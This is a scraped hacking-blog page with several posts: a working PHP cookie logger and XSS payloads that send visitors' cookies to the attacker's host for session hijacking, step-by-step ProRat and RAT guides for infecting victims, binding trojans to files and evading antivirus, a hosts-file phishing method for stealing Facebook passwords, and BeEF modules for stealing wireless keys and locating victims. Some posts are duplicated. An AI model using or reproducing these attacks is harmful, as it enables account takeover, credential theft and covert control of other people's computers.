- Get ready for some down-and-dirty hackin'! Over 200 serious hacks readers can use to force Windows XP to do it their way, written in the ExtremeTech no-holds-barred style
- Sinchak doesn't waste time tweaking Movie Maker or Instant Messenger-these hacks are heavy-duty, detailed instructions for squeezing every drop of power from Windows XP and maximizing speed, appearance, and security
- Not for the faint of heart! This book is written for users who aren't afraid to roll up their sleeves, risk voiding their warranties, take total control of the task bar, uninstall programs that are supposedly permanent, and beef up boot speed
- Mines gems like unlocking hidden settings, customizing boot screens, supercharging online and program launch speed, maximizing the file system and RAM, and dumping hated features for good
- Written by the creator of TweakXP.com, a site considered Mecca for Windows hackers and trusted by more than ten million Windows XP users worldwide
- Includes a hacker's dream CD-ROM with a set of ready-to-install hacks, theme creation tools, custom boot screens, "undo" files that help the reader tinker with Windows XP's registry, and a whole lot more
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Friday, February 15, 2013
HACKING WINDOWS XP
Tuesday, February 5, 2013
Session hijacking or cookie stealing using php and javascript
In computer science, session hijacking refers to the exploitation of a
valid computer session—sometimes also called a session key—to gain
unauthorized access to information or services in a computer system. In
particular, it is used to refer to the theft of a magic cookie used to
authenticate a user to a remote server. It has particular relevance to
web developers, as the HTTP cookies used to maintain a session on many
web sites can be easily stolen by an attacker using an intermediary
computer or with access to the saved cookies on the victim's computer
(see HTTP cookie theft).
Here we show how you can hack a session using javascript and php.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
PHP Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.
Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.
The best way is to look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>
Clicking an image also can activate the script.For this purpose you can use the below code.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>
All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.
Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
Don't forget to comment if you like my post.
Here we show how you can hack a session using javascript and php.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
PHP Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.
Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.
The best way is to look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>
Clicking an image also can activate the script.For this purpose you can use the below code.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>
All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.
Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
Don't forget to comment if you like my post.
Tuesday, December 4, 2012
How To Surf The Web Anonymously With Proxies
Are you looking to surf the Internet without anyone knowing your location or details? Do you want to regain access to a banned website or forum? Well you’ve come to the right place as in this article I will answer the frequently asked question, How To Surf The Web Anonymously ? , How to access restricted websites?.
What is a proxy?
A proxy is an address ( IP address ) of a Server (proxy server) that is placed between your computer and the Internet
Without Proxy
With Proxy
The advantage of a proxy is that your real IP address is Hidden so when you hack your giving the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server.You can use it to enter site or forum that you are IP is banned
Follow the steps given below to Surf the web Anonymously
How To Surf The Web Anonymously With Proxies
First we need to find a proxy sever .There are thousand's of free proxy severs on the net You can find them by googling .For this tutorial i will be using proxies from www.aliveproxy.com
Now open your web Browser
Using proxy with Internet Explorer
1. First open Internet explorer .Go to Tools menu, and click on Internet Options
2. Now select connections tab and then select Lan settings
3. Now check "Use proxy" and enter the address of the proxy server and the
port .(use the proxy that we got from www.aliveproxy.com )
4. Now Hit ok that's it now we can surf with proxies
Using Proxy With Fire Fox
1. Open FireFox Go to Tools menu, and click on Options
2. Now select "connections settings" and then click on the “Manual Proxy
Configuration” button and enter the proxy address and port you have from the site
mentioned above, in the HTTP Proxy address and Port boxes. Click the OK button
twice, and you're done.
Configuration” button and enter the proxy address and port you have from the site
mentioned above, in the HTTP Proxy address and Port boxes. Click the OK button
twice, and you're done.
To check weather your behind a proxy go to www.whatismyip.com you can see a
different ip address after setting up your proxy
Hope you'll find this tutorial useful . If you have any doubts please be free to commentdifferent ip address after setting up your proxy
Thursday, November 29, 2012
RATs: How to hack computer remotely
Remote Administration Tools-RATs:
RATs also called as Remote Administration tools are popularly used software to control other computer remotely and considering hacking aspects, hack computer remotely. There are many RATs such as:-
- Prorat
- Turkojan
- Yuri RAT and many other.
Working of RATs:
To hack computer remotely using a RAT, you have to create a server and then send this server to victim whose you want to hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed and this server opens port of victim computer and by using this opened port, you are able to hack computer remotely.
It is this RAT server that then sends all system information to PRORAT and we can then hack computer remotely using PRORAT.
Things you can do by hacking computer remotely:
Once you gain access to remote computer, you can hack computer remotely and perform any of following:-
# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of system registry
# Hack locally stored passwords and licence keys
# Download additional malware and servers to gain stronger control
# Control and access all Control Panel options(including add or remove programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection and start file transaction
Thus, you are able to hack computer remotely 100%. This software to hack computer remotely is hence very popular.
Disadvantage of remote hacking software RAT:
The main disadvantage of this software to hack computer remotely – RAT is that the server created to hack computer remotely is recognized by most ant viruses as hack tool and hence, ant viruses send alert messages when installing RAT server to hack computer remotely.
But, there are many software’s like Binders or Crypters to hide RAT server and prevent Ant viruses from sending alerts. Even there are software’s like AVkiller which is used to turn antivirus inactive and then our server (used to hack computer remotely) can be installed on victim computer very easily.
Also, you need to port forward your router to enable RAT to hack computer remotely.
This is all about RATs – software to hack computer remotely. In my next article, I will inform about server creation and installation on remote computer to hack computer remotely.
Enjoy n hack computer remotely…
Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.
RATs also called as Remote Administration tools are popularly used software to control other computer remotely and considering hacking aspects, hack computer remotely. There are many RATs such as:-
- Prorat
- Turkojan
- Yuri RAT and many other.
Working of RATs:
To hack computer remotely using a RAT, you have to create a server and then send this server to victim whose you want to hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed and this server opens port of victim computer and by using this opened port, you are able to hack computer remotely.
It is this RAT server that then sends all system information to PRORAT and we can then hack computer remotely using PRORAT.
Things you can do by hacking computer remotely:
Once you gain access to remote computer, you can hack computer remotely and perform any of following:-
# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of system registry
# Hack locally stored passwords and licence keys
# Download additional malware and servers to gain stronger control
# Control and access all Control Panel options(including add or remove programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection and start file transaction
Thus, you are able to hack computer remotely 100%. This software to hack computer remotely is hence very popular.
Disadvantage of remote hacking software RAT:
The main disadvantage of this software to hack computer remotely – RAT is that the server created to hack computer remotely is recognized by most ant viruses as hack tool and hence, ant viruses send alert messages when installing RAT server to hack computer remotely.
But, there are many software’s like Binders or Crypters to hide RAT server and prevent Ant viruses from sending alerts. Even there are software’s like AVkiller which is used to turn antivirus inactive and then our server (used to hack computer remotely) can be installed on victim computer very easily.
Also, you need to port forward your router to enable RAT to hack computer remotely.
This is all about RATs – software to hack computer remotely. In my next article, I will inform about server creation and installation on remote computer to hack computer remotely.
Enjoy n hack computer remotely…
Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.
Facebook hacked
Facebook is becoming secured day by day, it daily fixes
several bugs found by users. Recently we have noticed that it has also
tried to fix the Phishing loophole by validating the previous URL from
which the user is arriving to Facebook. It validates from which source
user is arriving on Facebook and hence if its a fake Facebook Page, it warns its users that Please Change your Password Immediately as you might be a victim of Phishing. This validation made Facebook account passwords secured from thousands of Novice and Script Kiddie Hackers but L33T still can’t be stopped, as L33Ts never stop, they keep on moving to new alternatives.
So we moved to advanced mode of Phishing like Tabnabbing,
meta refresh trick, browser side bypassing and even manipulating
host(hint is sufficient as i will not disclose this one)..when i feel
bored i use this technique to hack accounts and passwords of Facebook.
Just try to figure out what we can do using Host File
..Not going to tell more than that…
Ok…. Ok… Lets learn today the technique called Host Name IP mapped based Phishing.
You all will be really happy to know that i have written my third white
paper on the same topic and you will be more than happy by knowing that
this technique of Phishing is invented by Lokesh Singh (:P none other
than me…).. So friends lets start our tutorial.
![]() |
| How to hack Facebook account and passwords |
Note: This is for Educational Purposes only. Don’t misuse it.:P Please…
Requirements:
1. Facebook latest Phisher or Fake Pages.
Download Latest Facebook Phisher here: Download Now
2. Free Web hosting server to upload those Phish Pages.
3. Spoofing URL using Host name mapping technique.
Let me provide you little background what i will teach you today. I
know most of you already know phishing but for first timers, let me
explain a bit. Phish Pages means Fake Pages that looks absolutely
similar to original pages and the technique of using those Fake pages
to hack anyone’s user name and password is called Phishing. And
technique which we use to send these fake pages to victim and prompt him
to believe that they are real is called Social Engineering. But i
think this we already know, what’s new we are going to discuss today..
Ahhh… Just wait and hold your pants tight because today i will be
breaking all the policies and ethical norms because until and unless we
don’t know how hackers do things we will never able to stand in front of
them.
What is New???
We all know that fake pages can only be detected using two techniques:
1. Verifying the URL in the address bar, if its a fake page then URL must be different from original one.
2. Using any web security toolbar that warns users for fake pages like AVG toolbar, Norton Online security toolbar etc..
But what if you open www.facebook.com manually in your web browser and fake page opens and URL in the web browser remains www.facebook.com only.
That means first technique to detect fake page go in vain. Now for
second technique, all online web security toolbar detect fake pages by
comparing the input by user in URL address bar and original page URL.
If both matches then its not a fake page else its a malware page.
So friends today i will teach you how to make your fake pages open
whenever victim opens Facebook in his/her web browser. Ahhh… You will be
now thinking its impossible. But as i have told you i have written a
white paper on Advanced Phishing techniques. So its 110% possible to
load fake web page whenever user opens www.facebook.com or any other
website like Yahoo, Hotmail or anything… Below are the steps and video
for the same.
I had made the video as well as written the steps in detail which will tell you everything step by step.
Steps to Hack Facebook account or Password:
1. Download the Latest Facebook Phisher.
2. Extract the files, you will get below 4 files:
- index.php
- facebook1.php
- passwords.html
- thanks.php
3. Now go to any free web hosting web server to upload these fake pages.
Note all should be uploaded at root means not in any folder. Just at first level directory.
4. Now you need to find the correct IP address of the account you have created on web hosting server.
5. When you get you fake page’s IP address, now what we need to do
is that we have to add the entry of the IP address against the
www.facebook.com in victim’s host file located at below location.
C:\Windows\System32\drivers\etc
6. There are several ways of doing that, i have written my own php
scripts for doing the same but i cannot share that with you guys because
there are chances of misusing it. So i explain you the logic and rest
you need to figure out how you will edit victims host file and append
your Fake Page IP address against www.facebook.com.
7. Now after doing steps 5 and 6, whenever user open the www.facebook.com,
your fake Facebook page will open and victim will never be able to
visit the original Facebook, so he cannot even been able to change his password…:P
8. I have added an extra logic to my scripts, whenever victim enter
the password and hit enter button, i am removing the entry of Fake IP
address against www.facebook.com from the host file by making it spaces.
So it will be for him for one time only which sounds more spoofed. Its
just a single line code but i cannot tell you guys because it will make
this article completely unethical.
I will teach you techniques but i will not do spoon feeding because
if you want to become good hacker then you need to use your brain too. I
love to be called Destructive but i do constructive works..:P like this
one…rofl…
9. Everything other than this is similar to normal phishing technique..
I hope you all like it… If not here is the video of the complete hack in detail with each and every step shown practically.
Note: In video i am using my localhost as web server which in your
case will be uraccountname.my3gb.com or other means where you uploaded
your files.
Also you must know 127.0.0.1 is localhost IP address. For you case your webhosting will be the IP address that will be used to map against facebook.
I hope you all love this tutorial
you have to… Because its the best method for hacking anyone’s account..
Monday, November 26, 2012
BeEF module for Geolocation Tracking (via Wireless Access Points)
I have ported my code over to BeEF #beefproject http://beefproject.com/ My module is not in the repository yet.
1. Meanwhile, you can download the file attached and copy and extract the files to /pentest/web/beef/modules/host/ . After that, you should be able to access the module in BeEF as shown in the below screenshot.

2. The user will receive the below popup in their web browser. You can change the name of the Java applet to something more discrete as compared to what I have named.

Within seconds, you should be able to get the geolocation of the remote user.

You can download the BeEF module via one of the below links if you do not want to wait for it to be committed to the repository.
https://www2.dropbox.com/sh/cxpafqhpscszfoe/8bGfta5G5W/get_physical_location.zip
I will be doing a write up about the things I learn about writing BeEF module with Java applet integration in the next couple of days.
I hope it can help other people who are just getting started with BeEF development.
Let me know if you would have any suggestions. Thanks !
1. Meanwhile, you can download the file attached and copy and extract the files to /pentest/web/beef/modules/host/ . After that, you should be able to access the module in BeEF as shown in the below screenshot.
2. The user will receive the below popup in their web browser. You can change the name of the Java applet to something more discrete as compared to what I have named.
Within seconds, you should be able to get the geolocation of the remote user.
You can download the BeEF module via one of the below links if you do not want to wait for it to be committed to the repository.
https://www2.dropbox.com/sh/cxpafqhpscszfoe/8bGfta5G5W/get_physical_location.zip
I will be doing a write up about the things I learn about writing BeEF module with Java applet integration in the next couple of days.
I hope it can help other people who are just getting started with BeEF development.
Let me know if you would have any suggestions. Thanks !
Hacking Beyond The Browser with BeEF (Robbing Your Wireless Keys)
Pauldotcom has a very interesting post on “Retrieving Clear Text Wireless Keys” from Compromised Systems” at http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html
As mentioned in the post, this works on Windows Vista and 7.
I have written a BeEF module called “Get Wireless Keys” which automates the process of robbing the victim of the wireless keys using a signed Java applet.
Follow the steps listed on https://github.com/beefproject/beef/wiki/BeEF-and-Backtrack-5 in order to download BeEF. My module is now available in the repo.
If you are new to BeEF, you can find some video tutorials here. https://github.com/beefproject/beef/wiki
This will act as a bridge to allow hacking beyond the browser as you will easily be able to compromise other systems in the network once you connect to the victim’s wireless networks using the stolen wireless keys on your computer.

Upon launching the module against the victim, the victim will get a popup on his browser. The victim would need to click “Run” in order for this to work.

You will see the below output in the console of BeEF. This means that the victim’s has executed the java applet and the applet has returned some results.

In the below screen shot, it shows that the wireless profiles on the victim’s computer has been saved to /pentest/web/beef/exported_wlan_profiles.xml

The next thing that we need to do is to import the wireless into your Windows Vista/7 computer.

You should be able to connect to the wireless networks that have been saved on the victim’s computer without any password prompts.
You might want to use this module together with “get physical location” module that I have written to identify the actual location of the wireless access point that the victim use in his home or office.
Thats if you are within close proximity to the victim. If not, this module is useless to you.
Alternatively, you could mass mail to all emails address that you can find that belong to a domain with the link to beef.
If you are using Preshared Keys instead WPA/WPA2 enterprise in your organisation, then all you need is one person in the organization to click Run to the Java Applet alert popup to get pwned.
As mentioned in the post, this works on Windows Vista and 7.
I have written a BeEF module called “Get Wireless Keys” which automates the process of robbing the victim of the wireless keys using a signed Java applet.
Follow the steps listed on https://github.com/beefproject/beef/wiki/BeEF-and-Backtrack-5 in order to download BeEF. My module is now available in the repo.
If you are new to BeEF, you can find some video tutorials here. https://github.com/beefproject/beef/wiki
This will act as a bridge to allow hacking beyond the browser as you will easily be able to compromise other systems in the network once you connect to the victim’s wireless networks using the stolen wireless keys on your computer.
Upon launching the module against the victim, the victim will get a popup on his browser. The victim would need to click “Run” in order for this to work.
You will see the below output in the console of BeEF. This means that the victim’s has executed the java applet and the applet has returned some results.
In the below screen shot, it shows that the wireless profiles on the victim’s computer has been saved to /pentest/web/beef/exported_wlan_profiles.xml
The next thing that we need to do is to import the wireless into your Windows Vista/7 computer.
You should be able to connect to the wireless networks that have been saved on the victim’s computer without any password prompts.
You might want to use this module together with “get physical location” module that I have written to identify the actual location of the wireless access point that the victim use in his home or office.
Thats if you are within close proximity to the victim. If not, this module is useless to you.
Alternatively, you could mass mail to all emails address that you can find that belong to a domain with the link to beef.
If you are using Preshared Keys instead WPA/WPA2 enterprise in your organisation, then all you need is one person in the organization to click Run to the Java Applet alert popup to get pwned.
Sunday, November 25, 2012
Hack Remote Computers using PRORAT
Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.
If you are new to RATing, it is strongly recommended to read my previous articles which give you all the basic and advanced stuff about RATs.
Hack Remote Computers using EXTREME RAT
Trojans and RATs- Know The Facts
DARK-COMET v4.2 RAT TUTORIAL
procedure to setup ProRat
STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password "pro".
STEP 2. Open up the program and You should see the following window.
STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".
STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.
STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.
STEP 6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.
STEP 7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files.
STEP 8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.
STEP 9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.
STEP 10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.
NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont know how to find an IP address, you can read my article on finding out remote IP address from here.
How to hack an IP address of a remote computer
Hope you enjoyed the tutorial. Feel free to leave your comments for further doubts and clarifications.
Subscribe to:
Posts (Atom)



















